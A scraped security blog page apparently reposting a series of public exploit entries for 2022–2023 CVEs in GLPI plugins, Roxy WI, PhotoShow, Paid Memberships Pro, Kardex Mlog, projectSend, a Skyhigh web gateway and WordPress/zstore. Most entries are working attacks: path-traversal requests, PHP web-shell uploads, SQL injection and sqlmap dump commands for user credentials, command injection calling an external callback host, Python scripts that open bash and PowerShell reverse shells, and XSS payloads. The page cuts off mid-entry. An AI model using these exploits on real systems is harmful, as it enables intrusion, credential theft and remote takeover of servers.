# ADVISORY INFORMATION
# Exploit Title: GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin
# Date of found: 11 Jun 2022
# Application: GLPI Manageentities < 4.0.2
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/manageentities
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-34127
# PoC
GET /marketplace/manageentities/inc/cri.class.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863110635
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# ADVISORY INFORMATION
# Exploit Title: GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion
# Date of found: 11 Jun 2022
# Application: GLPI Glpiinventory <= 1.0.1
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/glpi-project/glpi-inventory-plugin
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-31062
# PoC
POST /marketplace/glpiinventory/b/deploy/index.php?action=getFilePart&file=../../\\..\\..\\..\\..\\System32\\drivers\\etc\\hosts&version=1 HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
# ADVISORY INFORMATION
# Exploit Title: Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload
# Date of found: 21 July 2022
# Application: Roxy WI <= v6.1.1.0
# Author: Nuri Çilengir
# Vendor Homepage: https://roxy-wi.org
# Software Link: https://github.com/hap-wi/roxy-wi.git
# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-31161
# PoC
POST /app/options.py HTTP/1.1
Host: 192.168.56.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: https://192.168.56.116
Referer: https://192.168.56.116/app/login.py
Connection: close
show_versions=1&token=&alert_consumer=notNull&serv=127.0.0.1&delcert=a%20&%20wget%20<id>.oastify.com;
# Exploit Title: GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)
# Date of found: 11 Jun 2022
# Application: GLPI Cartography < 6.0.0
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/positions
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-34128
# PoC
POST /marketplace/positions/front/upload.php?name=poc.php HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 39
Origin: http://192.168.56.113
Connection: close
<?php echo system($_GET["cmd"]); ?>
# ADVISORY INFORMATION
# Exploit Title: GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)
# Date of found: 11 Jun 2022
# Application: GLPI >=10.0.0, < 10.0.3
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/glpi-project/glpi
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-31056
# PoC
POST /front/change.form.php HTTP/1.1
Host: acme.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------190705055020145329172298897156
Content-Length: 4836
Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQ
n53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg
-----------------------------190705055020145329172298897156
Content-Disposition: form-data; name="id"
0
-----------------------------190705055020145329172298897156
Content-Disposition: form-data; name="_glpi_csrf_token"
752d2ff606bf360d809b682f0d9da9c23b290b31453f493f4924e16e77bbba35
-----------------------------190705055020145329172298897156
Content-Disposition: form-data; name="_actors"
{"requester":[],"observer":[],"assign":[{"itemtype":"User","items_id":"2','2',); INSERT INTO `glpi_documenttypes` (`name`, `ext`, `icon`, `mime`, `is_uploadable`) VALUES('PHP', 'php', 'jpg-dist.png', 'application/x-php', 1); ---'","use_notification":"1","alternative_email":""}]}
-----------------------------190705055020145329172298897156--
If you manipulate the filename uploaded to the system, the file is placed under /files/_tmp/. HTTP GET request required to trigger the issue is as follows.
POST /ajax/fileupload.php HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Glpi-Csrf-Token: bb1c7f6cd4c1865838b234b4f703172a57c19c276d11eb322936d770d75c6dd7
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------102822935214007887302871396841
Content-Length: 559
Origin: http://acme.com
Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg
-----------------------------102822935214007887302871396841
Content-Disposition: form-data; name="name"
_uploader_filename
-----------------------------102822935214007887302871396841
Content-Disposition: form-data; name="showfilesize"
1
-----------------------------102822935214007887302871396841
Content-Disposition: form-data; name="_uploader_filename[]"; filename="test.php"
Content-Type: application/x-php
Output:
<?php echo system($_GET['cmd']); ?>
-----------------------------102822935214007887302871396841--
# POC URL
http://192.168.56.113/files/_tmp/poc.php?cmd=
# Exploit Title: GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin
# Date of found: 11 Jun 2022
# Application: GLPI Activity < 3.1.0
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/activity
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-34125
# PoC
GET /marketplace/activity/front/cra.send.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
# Exploit Title: PhotoShow 3.0 - Remote Code Execution
# Date: January 11, 2023
# Exploit Author: LSCP Responsible Disclosure Lab
# Detailed Bug Description: https://lscp.llc/index.php/2021/07/19/how-white-box-hacking-works-remote-code-execution-and-stored-xss-in-photoshow-3-0/
# Vendor Homepage: https://github.com/thibaud-rohmer
# Software Link: https://github.com/thibaud-rohmer/PhotoShow
# Version: 3.0
# Tested on: Ubuntu 20.04 LTS
# creds of a user with admin privileges required
import sys
import requests
import base64
import urllib.parse
if(len(sys.argv)!=6):
print('Usage: \n\tpython3 ' + sys.argv[0] + ' "login" ' +
'"password" "target_ip" "attacker_ip" "attacker_nc_port"')
quit()
login=sys.argv[1]
password=sys.argv[2]
targetIp = sys.argv[3]
attackerIp = sys.argv[4]
attackerNcPort = sys.argv[5]
def main():
session = requests.Session()
#login as admin user
logInSession(session, targetIp, login, password)
#change application behaviour for handling .mp4 video
uploadExpoit(session, targetIp, attackerIp, attackerNcPort)
#send the shell to attaker's nc by uploading .mp4 video
sendMP4Video(session, targetIp)
print("Check your netcat")
def logInSession(session, targetIp, login, password):
session.headers.update({'Content-Type' : "application/x-www-form-urlencoded"})
data = "login="+login+"&password="+password
url = "http://"+targetIp+"/?t=Login"
response= session.post(url, data=data)
phpsessid=response.headers.get("Set-Cookie").split(";")[0]
session.headers.update({'Cookie' : phpsessid})
def uploadExpoit(session, targetIp, attackerIp, attackerNcPort):
exiftranPathInjection=createInjection(attackerIp, attackerNcPort)
url = "http://"+targetIp+"/?t=Adm&a=Set"
data = "name=PhotoShow&site_address=&loc=default.ini&user_theme=Default&" \
+ "rss=on&max_comments=50&thumbs_size=200&fbappid=&ffmpeg_path=&encode_video=on&"\
+ "ffmpeg_option=-threads+4+-vcodec+libx264+-acodec+libfdk_aac&rotate_image=on&"\
+ exiftranPathInjection
session.post(url, data=data).content.decode('utf8')
def createInjection(attakerIp, attackerNcPort):
textToEncode = "bash -i >& /dev/tcp/"+attackerIp+"/"+attackerNcPort+" 0>&1"
b64Encoded = base64.b64encode(textToEncode.encode("ascii"))
strb64 = str(b64Encoded)
strb64 = strb64[2:len(strb64)-1]
injection = {"exiftran_path":"echo "+ strb64 +" | base64 -d > /tmp/1.sh ;/bin/bash /tmp/1.sh"}
return urllib.parse.urlencode(injection)
def sendMP4Video(session, targetIp):
session.headers.update({'Content-Type' : "multipart/form-data; "\
+"boundary=---------------------------752343701418612422363028651"})
url = "http://"+targetIp+"/?a=Upl"
data = """-----------------------------752343701418612422363028651\r
Content-Disposition: form-data; name="path"\r
\r
\r
-----------------------------752343701418612422363028651\r
Content-Disposition: form-data; name="inherit"\r
\r
1\r
-----------------------------752343701418612422363028651\r
Content-Disposition: form-data; name="images[]"; filename="a.mp4"\r
Content-Type: video/mp4\r
\r
a\r
-----------------------------752343701418612422363028651--\r
"""
try:
session.post(url, data=data, timeout=0.001)
except requests.exceptions.ReadTimeout:
pass
if __name__ =="__main__":
main()
#!/usr/bin/env python
# Exploit Title: Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection
# Exploit Author: r3nt0n
# CVE: CVE-2023-23488
# Date: 2023/01/24
# Vulnerability discovered by Joshua Martinelle
# Vendor Homepage: https://www.paidmembershipspro.com
# Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip
# Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9
# Version: < 2.9.8
# Tested on: Debian 11 - WordPress 6.1.1 - Paid Memberships Pro 2.9.7
#
# Running this script against a WordPress instance with Paid Membership Pro plugin
# tells you if the target is vulnerable.
# As the SQL injection technique required to exploit it is Time-based blind, instead of
# trying to directly exploit the vuln, it will generate the appropriate sqlmap command
# to dump the whole database (probably very time-consuming) or specific chose data like
# usernames and passwords.
#
# Usage example: python3 CVE-2023-23488.py http://127.0.0.1/wordpress
import sys
import requests
def get_request(target_url, delay="1"):
payload = "a' OR (SELECT 1 FROM (SELECT(SLEEP(" + delay + ")))a)-- -"
data = {'rest_route': '/pmpro/v1/order',
'code': payload}
return requests.get(target_url, params=data).elapsed.total_seconds()
print('Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\n')
if len(sys.argv) != 2:
print('Usage: {} <target_url>'.format("python3 CVE-2023-23488.py"))
print('Example: {} http://127.0.0.1/wordpress'.format("python3 CVE-2023-23488.py"))
sys.exit(1)
target_url = sys.argv[1]
try:
print('[-] Testing if the target is vulnerable...')
req = requests.get(target_url, timeout=15)
except:
print('{}[!] ERROR: Target is unreachable{}'.format(u'\033[91m',u'\033[0m'))
sys.exit(2)
if get_request(target_url, "1") >= get_request(target_url, "2"):
print('{}[!] The target does not seem vulnerable{}'.format(u'\033[91m',u'\033[0m'))
sys.exit(3)
print('\n{}[*] The target is vulnerable{}'.format(u'\033[92m', u'\033[0m'))
print('\n[+] You can dump the whole WordPress database with:')
print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump'.format(target_url))
print('\n[+] To dump data from specific tables:')
print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users'.format(target_url))
print('\n[+] To dump only WordPress usernames and passwords columns (you should check if users table have the default name):')
print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users -C user_login,user_pass'.format(target_url))
sys.exit(0)
#!/usr/bin/env python3
# Exploit Title: Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)
# Date: 12/13/2022
# Exploit Author: Patrick Hener
# Vendor Homepage: https://www.kardex.com/en/mlog-control-center
# Version: 5.7.12+0-a203c2a213-master
# Tested on: Windows Server 2016
# CVE : CVE-2023-22855
# Writeup: https://hesec.de/posts/CVE-2023-22855
#
# You will need to run a netcat listener beforehand: ncat -lnvp <port>
#
import requests, argparse, base64, os, threading
from impacket import smbserver
def probe(target):
headers = {
"Accept-Encoding": "deflate"
}
res = requests.get(f"{target}/\\Windows\\win.ini", headers=headers)
if "fonts" in res.text:
return True
else:
return False
def gen_payload(lhost, lport):
rev_shell_blob = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()'
rev_shell_blob_b64 = base64.b64encode(rev_shell_blob.encode('UTF-16LE'))
payload = f"""<#@ template language="C#" #>
<#@ Import Namespace="System" #>
<#@ Import Namespace="System.Diagnostics" #>
<#
var proc1 = new ProcessStartInfo();
string anyCommand;
anyCommand = "powershell -e {rev_shell_blob_b64.decode()}";
proc1.UseShellExecute = true;
proc1.WorkingDirectory = @"C:\Windows\System32";
proc1.FileName = @"C:\Windows\System32\cmd.exe";
proc1.Verb = "runas";
proc1.Arguments = "/c "+anyCommand;
Process.Start(proc1);
#>"""
return payload
def start_smb_server(lhost):
server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)
server.addShare("SHARE", os.getcwd(), '')
server.setSMB2Support(True)
server.setSMBChallenge('')
server.start()
def trigger_vulnerability(target, lhost):
headers = {
"Accept-Encoding": "deflate"
}
requests.get(f"{target}/\\\\{lhost}\\SHARE\\exploit.t4", headers=headers)
def main():
# Well, args
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', help='Target host url', required=True)
parser.add_argument('-l', '--lhost', help='Attacker listening host', required=True)
parser.add_argument('-p', '--lport', help='Attacker listening port', required=True)
args = parser.parse_args()
# Probe if target is vulnerable
print("[*] Probing target")
if probe(args.target):
print("[+] Target is alive and File Inclusion working")
else:
print("[-] Target is not alive or File Inclusion not working")
exit(-1)
# Write payload to file
print("[*] Writing 'exploit.t4' payload to be included later on")
with open("exploit.t4", 'w') as template:
template.write(gen_payload(args.lhost, args.lport))
template.close()
# Start smb server in background
print("[*] Starting SMB Server in the background")
smb_server_thread = threading.Thread(target=start_smb_server, name="SMBServer", args=(args.lhost,))
smb_server_thread.start()
# Rev Shell reminder
print("[!] At this point you should have spawned a rev shell listener")
print(f"[i] 'ncat -lnvp {args.lport}' or 'rlwrap ncat -lnvp {args.lport}'")
print("[?] Are you ready to trigger the vuln? Then press enter!")
input() # Wait for input then continue
# Trigger vulnerability
print("[*] Now triggering the vulnerability")
trigger_vulnerability(args.target, args.lhost)
# Exit
print("[+] Enjoy your shell. Bye!")
os._exit(1)
if __name__ == "__main__":
main()
Exploit Title: projectSend r1605 - Remote Code Exectution RCE
Application: projectSend
Version: r1605
Bugs: rce via file extension manipulation
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 26-01-2023
Author: Mirabbas Ağalarov
Tested on: Linux
POC video: https://youtu.be/Ln7KluDfnk4
2. Technical Details & POC
========================================
1.The attacker first creates a txt file and pastes the following code. Next, the Attacker changes the file extension to jpg. Because the system php,sh,exe etc. It does not allow files.
bash -i >& /dev/tcp/192.168.100.18/4444 0>&1
2.Then the attacker starts listening for ip and port
nc -lvp 4444
3.and when uploading file it makes http request as below.file name should be like this openme.sh;jpg
POST /includes/upload.process.php HTTP/1.1
Host: localhost
Content-Length: 525
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59
Connection: close
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="name"
openme.sh;jpg
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="chunk"
0
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="chunks"
1
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream
bash -i >& /dev/tcp/192.168.100.18/4444 0>&1
------WebKitFormBoundary0enbZuQQAtahFVjI--
4.In the second request, we do this to the filename section at the bottom.
openme.sh
POST /files-edit.php?ids=34 HTTP/1.1
Host: localhost
Content-Length: 1016
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/files-edit.php?ids=34&type=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59
Connection: close
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="csrf_token"
66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][id]"
34
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][original]"
openme.sh;.jpg
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][file]"
1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][name]"
openme.sh
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][description]"
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][expiry_date]"
25-02-2023
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="save"
------WebKitFormBoundaryc8btjvyb3An7HcmA--
And it doesn't matter who downloads your file. if it opens then reverse shell will be triggered and rce
private youtube video poc : https://youtu.be/Ln7KluDfnk4
Exploit Title: Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)
Product: Secure Web Gateway
Affected Versions: 10.2.11, potentially other versions
Fixed Versions: 10.2.17, 11.2.6, 12.0.1
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://www.skyhighsecurity.com/en-us/products/secure-web-gateway.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-002
Advisory Status: published
CVE: CVE-2023-0214
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0214
Introduction
============
"Skyhigh Security Secure Web Gateway (SWG) is the intelligent,
cloud-native web security solution that connects and secures your
workforce from malicious websites and cloud apps—from anywhere, any
application, and any device."
(from the vendor's homepage)
More Details
============
The Secure Web Gateway's (SWG) block page, which is displayed when a
request or response is blocked by a rule, can contain static files such
as images, stylesheets or JavaScript code. These files are embedded
using special URL paths. Consider the following excerpt of a block page:
------------------------------------------------------------------------
<html>
<!-- FileName: index.html
Language: [en]
-->
<!--Head-->
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<title>McAfee Web Gateway - Notification</title>
<script src="/mwg-internal/de5fs23hu73ds/files/javascript/sw.js" type="text/javascript" ></script>
<link rel="stylesheet" href="/mwg-internal/de5fs23hu73ds/files/default/stylesheet.css" />
</head>
------------------------------------------------------------------------
Static content is loaded from URL paths prefixed with
"/mwg-internal/de5fs23hu73ds/". It was discovered that paths with this
prefix are intercepted and directly handled by the SWG no matter on
which domain they are accessed. While the prefix can be configured in
the SWG, attackers can also obtain it using another currently
undisclosed vulnerability.
By reverse engineering the file "libSsos.so" and analysing JavaScript
code, it was possible to derive the API of the "Ssos" plugin's
"SetLoginToken" action. Through the following call using the
command-line HTTP client curl, the behaviour of the plugin was further
analysed:
------------------------------------------------------------------------
$ curl --proxy http://192.168.1.1:8080 -i 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p'
HTTP/1.0 200 OK
P3P: p
Connection: Keep-Alive
Set-Cookie: MwgSso=v; Path=/; Max-Age=240;
Content-Type: application/javascript
Content-Length: 2
X-Frame-Options: deny
c;
------------------------------------------------------------------------
The response embeds the values of the three URL parameters "v", "c" and
"p". The value for "p" is embedded as value of the "P3P" header, the
value of "c" as the response body and the value of "v" as the value
of the cookie "MwgSso".
It is also possible to include newline or carriage return characters in
the parameter value which are not encoded in the output. Consequently,
if the value of the parameter "p" contains a line break, arbitrary
headers can be injected. If two line breaks follow, an arbitrary body
can be injected. If a suitable "Content-Length" header is injected, the
remaining headers and body of the original response will be ignored by
the browser. This means that apart from the initial "P3P" header, an
arbitrary response can be generated. For example, a page containing
JavaScript code could be returned, resulting in a cross-site scripting
attack.
Consequently, attackers can construct URL paths that can be appended to
any domain and cause an arbitrary response to be returned if the URL is
accessed through the SWG. This could be exploited by distributing such
URLs or even by offering a website which performs an automatic redirect
to any other website using such a URL. As a result, the SWG exposes its
users to self-induced cross-site scripting vulnerabilities in any
website.
Proof of Concept
================
In the following request, the "p" parameter is used to inject suitable
"Content-Type" and "Content-Length" headers, as well as an arbitrary
HTML response body.
------------------------------------------------------------------------
$ curl --proxy http://192.168.1.1:8080 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p%0aContent-Type: text/html%0aContent-Length: 27%0a%0a<h1>RedTeam Pentesting</h1>'
HTTP/1.0 200 OK
P3P: p
Content-Type: text/html
Content-Length: 27
<h1>RedTeam Pentesting</h1>
------------------------------------------------------------------------
As mentioned above, the HTTP response body could also include JavaScript
code designed to interact with the domain specified in the URL resulting
in a cross-site scripting vulnerability.
Workaround
==========
None.
Fix
===
According to the vendor, the vulnerability is mitigated in versions
10.2.17, 11.2.6 and 12.0.1 of the Secure Web Gateway. This was not
verified by RedTeam Pentesting GmbH. The vendor's security bulletin can
be found at the following URL:
https://kcm.trellix.com/corporate/index?page=content&id=SB10393
Security Risk
=============
The vulnerability could be used to perform cross-site scripting attacks
against users of the SWG in context of any domain. Attackers only need
to convince users to open a prepared URL or visit an attacker's website
that could perform an automatic redirect to an exploit URL. This exposes
any website visited through the SWG to the various risks and
consequences of a cross-site scripting vulnerability such as account
takeover. As a result, this vulnerability poses a high risk.
Timeline
========
2022-07-29 Vulnerability identified
2022-10-20 Customer approved disclosure to vendor
2022-10-20 Vulnerability was disclosed to the vendor
2023-01-17 Patch released by vendor for versions 10.2.17, 11.2.6 and
12.0.1.
2023-01-26 Detailed advisory released by RedTeam Pentesting GmbH
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Alter Posthof 1 Fax : +49 241 510081-99
52062 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
# Exploit Title: Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)
# Date: 2022-05-25
# Exploit Author: Mostafa Farzaneh
# WPScan page:
https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c
# Vendor Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/
# Software Link:
https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.4.06.zip
# Version: 1.4.06
# Tested on: Linux
# CVE : CVE-2022-2846
# Description:
The Calendar Event Multi View WordPress plugin before 1.4.07 does not have
any authorisation and CSRF checks in place when creating an event, and is
also lacking sanitisation as well as escaping in some of the event fields.
This could allow unauthenticated attackers to create arbitrary events and
put Cross-Site Scripting payloads in it.
#POC and exploit code:
As an unauthenticated user, to add a malicious event (on October 6th, 2022)
to the calendar with ID 1, open the code below
<html>
<body>
<form action="
https://example.com/?cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=0&method=adddetails"
method="POST">
<input type="hidden" name="Subject"
value='"><script>alert(/XSS/)</script>' />
<input type="hidden" name="colorvalue" value="#f00" />
<input type="hidden" name="rrule" value="" />
<input type="hidden" name="rruleType" value="" />
<input type="hidden" name="stpartdate" value="10/6/2022" />
<input type="hidden" name="stparttime" value="00:00" />
<input type="hidden" name="etpartdate" value="10/6/2022" />
<input type="hidden" name="etparttime" value="00:00" />
<input type="hidden" name="stpartdatelast" value="10/6/2022" />
<input type="hidden" name="etpartdatelast" value="10/6/2022" />
<input type="hidden" name="stparttimelast" value="" />
<input type="hidden" name="etparttimelast" value="" />
<input type="hidden" name="IsAllDayEvent" value="1" />
<input type="hidden" name="Location" value="CSRF" />
<input type="hidden" name="Description" value='<p style="text-align:
left;">CSRF</p>' />
<input type="hidden" name="timezone" value="4.5" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The XSS will be triggered when viewing the related event
## Exploit Title: zstore 6.6.0 - Cross-Site Scripting (XSS)
## Development: nu11secur1ty
## Date: 01.29.2023
## Vendor: https://zippy.com.ua/
## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4
## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4
## Description:
The value of manual insertion `point 1` is copied into the HTML
document as plain text between tags.
The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in
the manual insertion point 1.
This input was echoed unmodified in the application's response.
## STATUS: HIGH Vulnerability
[+] Exploit:
```GET
